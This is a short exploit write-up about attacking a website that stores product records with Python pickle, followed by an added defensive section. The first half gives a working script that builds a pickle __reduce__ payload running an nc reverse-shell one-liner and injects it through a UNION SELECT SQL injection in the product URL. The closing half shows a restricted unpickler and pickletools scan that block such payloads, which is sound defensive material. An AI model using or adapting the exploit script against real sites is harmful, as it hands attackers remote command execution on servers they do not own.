That's how I exploited a website that was using python pickle and pickletools modules.
I wrote this writeup a long time ago and I am now sharing it with you.
The website provides 4 store items which can be visited from address/view/product, where product is a number from 1 to 4. These 4 items are saved to and read from the database using the python module “pickle”.
It is possible to create a python object and inject it with pickle to open a reverse shell on the machine:
Python:
import pickle
import pickletools
import base64
import requests

class Payload:
    def __reduce__(self):
        import os
        # remote ip and port to open the reverse shell
        cmd = ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -i 2>&1 | nc ip port >/tmp/f")
        return os.system, (cmd,)

pickled = pickle.dumps(Payload())
pickletools.dis(pickled)  # print the opcode stream for inspection
p64 = base64.b64encode(pickled).decode()

ip, port = "TARGET_HOST", 80  # placeholder: host and port of the target web app
conn = requests.Session()
exploit = "' UNION SELECT '%s' -- " % p64  # injected through the product id
a = requests.utils.requote_uri(exploit)
url = "http://%s:%d/view/%s" % (ip, port, a)
resp = conn.get(url, allow_redirects=True)
conn.close()
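The loader the site should have used, added here as an example that is not part of the original writeup: a restricted unpickler that refuses any global outside an allowlist, plus a pickletools pre-scan (the same module the writeup uses for dis) that reports which globals a stored record would resolve before load() is ever called. It assumes product records are plain dicts; the allowlist, the function names and the sample pickles are constructed for this example.

```python
import io
import pickle
import pickletools

# Globals a stored product record may resolve. Assumed for this example: records
# are plain dicts/lists, so os.system, subprocess.* or builtins.eval never qualify.
ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

def referenced_globals(data: bytes):
    """(module, name) pairs GLOBAL / STACK_GLOBAL would resolve, read via pickletools.genops.
    Heuristic only (memo gets are not followed): find_class below stays the real gate."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name.endswith(("STRING", "UNICODE", "UNICODE8")):
            strings.append(arg)                               # operands of STACK_GLOBAL
        elif op.name == "GLOBAL":                             # protocol <= 3: "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2: # protocol >= 4
            found.append((strings[-2], strings[-1]))
    return found

class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only allowlisted globals: a __reduce__ payload never gets its callable."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def safe_loads(data: bytes):
    """Refuse on the static scan first, then load under the restricted unpickler."""
    bad = [g for g in referenced_globals(data) if g not in ALLOWED]
    if bad:
        raise pickle.UnpicklingError(f"pickle references {bad}")
    return RestrictedUnpickler(io.BytesIO(data)).load()

def load_product(data: bytes):
    """The stored record, or None when the pickle was refused (nothing executed)."""
    try:
        return safe_loads(data)
    except pickle.UnpicklingError:
        return None

def sample_pickle(kind: str, protocol: int = 4) -> bytes:
    """Constructed inputs: a benign record, or a __reduce__ payload bound to print()."""
    if kind == "benign":
        return pickle.dumps({"id": 1, "name": "widget", "price": 9.99}, protocol=protocol)
    class ReduceDemo:
        def __reduce__(self):
            return print, ("this line never runs",)
    return pickle.dumps(ReduceDemo(), protocol=protocol)
```

The pre-scan is what you would log and alert on; the find_class override is the control that actually stops execution, since a __reduce__ payload cannot run without resolving its callable.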